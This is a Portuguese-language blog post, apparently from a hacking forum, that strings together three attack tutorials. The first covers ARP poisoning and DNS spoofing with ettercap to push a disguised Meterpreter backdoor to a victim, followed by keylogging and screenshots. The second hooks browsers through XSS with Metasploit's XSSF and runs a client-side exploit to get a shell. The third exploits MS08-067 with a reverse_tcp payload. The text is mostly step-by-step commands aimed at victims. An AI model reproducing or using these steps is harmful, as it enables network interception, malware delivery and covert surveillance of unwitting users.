Set up portforwarding no sysctrl do seu kernel (se for em outra localização do seu kernel, procure na internet algo sobre kernel e versão no Ubuntu)

Código:
echo 1 > /proc/sys/net/ipv4/ip_forward


Set up etter.dns localizado em /usr/share/ettercap

Código:
nano /usr/share/ettercap/etter.dns


Remova a parte onde microsoft esta forwarded para o linux e adicione as seguintes linhas:

Código:
* A Seu Ip
*.* A Seu Ip *.*.* A Seu Ip *.*.*.* A Seu Ip


Crie um local onde você pode baixar o arquivo ex: mega.co.nz - sendspace - dropbox

Eu usei o Photoshop para editar algumas fotos que eu encontrei a respeito do Internet Explorer,
Criei uma página simples em html, adicionei uma folha de estilo - CSS para posicionar o botão de download e para fazer a página parecer o mesmo com todas as resolução da tela.

Copie todos os arquivos para o diretório de publicação padrão do Apache /var/www/

Restart o Apache:

Código:
/etc/init.d/apache2 restart


Ative o DNS spoofing:

Código:
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /ip da vitima/ /gateway ip/


Gateway IP pode ser encontrado digitando isso no terminal:

Código:
route -n


Agora só temos que esperar a nossa vítima para executar o backdoor. Quando a vítima executar o backdoor, você deve ver algo como "session 1 opened". Você pode ver suas sessões ativas, digitando:

Código:
sessions -r


OBS: Isso se deve devido o backdoor ter sido criado no Metasploit/Meterpreter, então é o comando acima que visualiza as sessões do mesmo, bem como quase todos os comandos na sequência abaixo. Para saber mais sobre Metasploit/Meterpreter busque no nosso forum, fale com firebits, espreto, spwam, bhio e outros membros, mas seja "claro e objetivo" nas suas perguntas e post sempre no nosso forum.

Você pode saltar para a primeira sessão, digitando:

Código:
sessions -i 1


Há uma série de comandos que são capazes de executar. Você pode vê-los todos, escrevendo:

Código:
help


Alguns exemplos:

Citação:
sysinfo => get system info
shell => jump into a cmd shell
keyscan_start => scan for keyboard input
keyscan_dump => dump keyboard input
keyscan_stop => stop scanning
screenshot => take screenshot
upload
download



Explorando Cross Site Scripting (XSS) com Metasploit

Cross Site Scripting é uma vulnerabilidade encontrada em aplicações, que existe quando a mesma não implementa mecanismos de validação de entradas dos dados fornecidos pelos usuários à aplicação. Existem casos em que a validação existe, porém, não é suficiente ou bem implementada, permitindo desta forma a possibilidade de executar scripts no browser do usuário.
Os ataques que exploram esta vulnerabilidade, na grande maioria dos casos, visam comprometer a segurança do usuário que utiliza a aplicação, conhecido como ataques client-side. Estes ataques incluem, captura de cookies de sessão, dados dos usuários, credenciais, criação de sites falsos (phishing), entre outros.

No Metasploit existe um framework ainda em fase de testes chamado XSSF, criado para facilitar a exploração de Cross Site Scripting, realizei uns testes bastantes satisfatórios, onde foi possível conseguir desde informações do navegador do usuário até a exploração de vulnerabilidades do browser com execução de comandos.

Para utilizar o framework é necessário fazer o download Aqui ou  https://dev.metasploit.com/redmine/attachments/596/XSSF.zip e extrair o arquivo dentro do diretório do Metasploit.

Tendo extraído o arquivo, basta executar a console do Metasploit e utilizar o comando load, conforme imagem ilustra.


Imagem

Quando executado o XSSF habilita um Web server contendo um código javascript que deverá ser executado no browser da vítima, sendo assim ele gera uma URL para uso de engenharia social, onde o atacante deve fornecer para o usuário. Neste caso a URL gerada foi: http://192.168.2.103:8888/loop.

Para demonstração foi utilizado uma vulnerabilidade de XSS encontrado na aplicação Web Damn Vulnerable Web App (DVWA) e executado a injeção do script.

Imagem

Para verificar se o código foi executado no browser do usuário, executa-se o comando “xssf_active_victms”


Imagem

Verificou-se que existe uma conexão ativa oriunda do browser Internet Explorer, com o comando “xssf_information”, é possível obter mais informações.


Imagem

O framework possui alguns módulos onde é possível interagir com o browser atacado. Nas imagens abaixo é possível verificar o uso do módulo auxiliary/xssf/alert.


Imagem

Após a execução do módulo é possível verificar no browser do usuário a janela do alert executado.


Imagem

Bem desta forma é possível obter outras informações tais como cookies de sessão, acesso ao clipboard entre outros.

Dado o nível de interação existente com o browser do usuário, é possível ainda executar exploits para explorar vulnerabilidades client-side.

Para exemplificar foi disparado contra o browser do usuário o exploit ms10_046_shortcut_icon_dllloader. As imagens ilustram a configuração e execução do exploit.


Imagem

Imagem

Imagem


Desta forma, é possível verificar que o exploit foi executado com sucesso e retornou para o atacante uma shell para execução de comandos.


Imagem

Com este post é possível mostrar o quanto um simples Cross Site Scripting refletido pode se tornar perigoso devido as grandes investidas contra a segurança client-side.

Explorando a Vulnerabilidade MS08-067



Esse é um tutorial que é bem básico, mas é essencial para que no futuro possamos estudar mais a fundo os recursos do Metasploit.
O cenário para este ataque é uma máquina rodando linux com o Metasploit instalado e uma com o Windows XP SP1 vulnerável a MS08_067_netapi.
Com as máquinas na mesma rede, vamos ver o ip de cada uma delas.
Na máquina linux basta dar um ifconfig

Imagem

Na máquina windows abra uma tela de prompt e de um ipconfig

Imagem

Agora vamos inicar o Metasploit, dando o comando msfconsole

Imagem

Como já sabemos qual a vulnerabilidade que vamos explorar, vamos fazer uma busca no Metasploit e descobrir o caminho correto do exploit. Para isso vamos usar o comando search ms08_067_netapi

Imagem

Pronto, ele nos retornou o caminho, agora vamos selecionar o exploit usando o seguinte comando use exploit/windows/smb/ms08_067_netapi

Imagem

Vamos agora definir o PAYLOAD que vamos utilizar, neste caso eu vou usar uma conexão reversa então use o comando set PAYLOAD windows/meterpreter/reverse_tcp para definir este PAYLOAD.

Imagem

Precisamos ver quais parametros nosso exploit vai precisar para atacar a máquina alvo, para isso usaremos o comando show options

Imagem

Podemos ver claramente na coluna Current Setting que existem dois valores ainda não definidos e que são necessários, que são o RHOST e o LHOST. Vamos definir o LHOST que é nosso IP local, então o comando fica assim set LHOST 10.0.0.7

Imagem

Para definir o RHOST daremos o seguinte comando set RHOST 10.0.0.8 lembrando que o IP da máquina alvo é 10.0.0.8

Imagem

Vamos dar novamente o comando show options para ver se ficou faltando algum parametro

Imagem

Bem como parece estar tudo ok, vamos lançar nosso exploit e ver se da certo. Para isso basta digitar exploit

Imagem

Show ! Aqui podemos ver que uma sessão foi aberta, isso quer dizer que o alvo foi invadido com sucesso.
Bem esse é o primeiro passo para o estudo do metasploit
Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...